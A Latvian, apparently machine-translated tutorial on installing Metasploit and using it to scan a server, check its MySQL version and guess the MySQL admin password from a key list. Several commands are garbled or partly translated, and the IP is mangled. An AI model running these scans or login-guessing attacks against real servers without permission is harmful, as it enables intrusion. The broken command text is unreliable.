Metasploit sistēma servera drošības pārbaudei

Satura rādītājs
Metasploit ietvars, ir rīks, lai izstrādātu un palaistu izmantošanu pret datoru vai serveri. Metasploit Framework ir uzrakstīts rubīna valodā, tas ir daudzplatformu, un tā darbināšanai nepieciešams jaudīgs dators, ir maksas versija un bezmaksas versija kopienai.
To var lejupielādēt vietnē www.metasploit.com/framework/download
Mēs gatavojamies instalēt Linux Ubutnu, bet tas darbojas citiem distros, mainot dažas komandas.
Mēs piekļūstam termināļa logam un instalējam rubīnu, pirms tas strādāja ar perl, bet tas bija ieprogrammēts pilnīgi jauns.
Mēs instalējam rubīna atkarības, lai pēc tam varētu palaist ietvaru.
 sudo apt-get install ruby ​​libruby rdoc sudo apt-get install libyaml-ruby sudo apt-get install libzlib-ruby sudo apt-get install libopenssl-ruby sudo apt-get install libdl-ruby sudo apt-get install libreadline-ruby sudo apt -get instalēt libiconv-ruby sudo apt-get install rubygems * sudo apt-get install libgtk2-ruby libglade2-ruby 

Atkarībā no versijas, kuru lejupielādēsim 32 vai 64 bitus no termink, mēs piešķirsim atļauju:
chmod + x metasploit-latest-linux-x64-installer.run

Mēs palaižam instalētāju un tiks atvērts instalēšanas logs:
sudo metasploit-latest-linux-x64-installer.run

Mēs noklikšķināsim uz šī Fordward), mēs definējam, vai tas tiks instalēts kā pakalpojums, un ostu, kuru tas aizņems, pēc noklusējuma tas izmanto 3790.
Instalēšanas beigās no termināļa loga un ar root piekļuvi mēs atjauninām sistēmu
ar komandu:
msfupdate

Metasploit ir programma bez grafiskas vides, kas pilnībā darbojas terminālī. Mēs piekļūstam programmatūrai no termināļa ar komandu:
msfconsole

Zinot MSF iekšēji
MSF (Metasploit Framework) Tas ir strukturēts vairākos moduļos, piemēram:

Izmanto Kādi ir MSF pieejamie skripti un programmas un kurus mēs varam izmantot, tie ir sakārtoti pēc operētājsistēmas un kategorijām, piemēram, exploits / windows / browser /, kas ir izmantojami pārlūkiem, kas darbojas sistēmā Windows.

Derīgās kravas: Tā ir darbība, kas tiks veikta, ja mūsu pārbaudāmo ievainojamību varēs atrast un izmantot.

Papildu: palīgskripti ar dažādām funkcijām, piemēram, palīgs / skeneris / portscan / tcp un, izmantojot šo tcp porta skeneri, mēs iegūtu porta statusu. Šis skripts ir alternatīva Nmap.

Ietver: Viņi kodē skriptu, lai izvairītos no dažiem pretvīrusiem un pretpirkstotājiem.

Mēs sākam testa piemēru no mūsu izpildāmā termināļa:
./msfconsole

Metsploit uzvedne ir msf> no turienes mēs izpildīsim visu, un, lai izietu, mēs vienkārši ierakstīsim exit
Mēs sāksim, skenējot ip ar nmap
msf> nmap -sV 190.155.80.110

Mēs aktivizējam papildu moduli, lai piekļūtu skripta rīkiem, kas ļaus strādāt ar mysql. Mēs varam redzēt arī moduļa versiju.

Mēs skenējam versiju mysql, acīmredzamu iemeslu dēļ ip ir fiktīvs un tikai piemēram:
 msf> palīgdarbības (mysql_version)> iestatiet RHOSTS 190.155.80.110 // iestatiet tālvadības ip msf> iestatiet RHOSTS 192.155.80.110 msf> palīgdarbības (mysql_version)> palaist // pārbaudiet mysql versiju 

Ja tas tiek izpildīts pareizi, tas var atgriezt mysql versiju:
[*] 190.155.80.110 darbojas Mysql5.0

Vēl viens gadījums ar skenēšanas moduli un mēģinājumu mainīt mysql saknes lietotāju:
 msf> izmantot skeneri / mysql / mysql_login msf> iestatīt USERNAME admin msf> iestatīt PASS_FILE /tmp/keys.lst // teksta fails ar iespējamām atslēgām zem otra msf> exploit 

Ja tas darbojas, mēs varam pieteikties mysql:
mysql -h 1920,155,80,110 -u admin -pkey

Jums palīdzēs attīstību vietā, daloties lapu ar draugiem

wave wave wave wave wave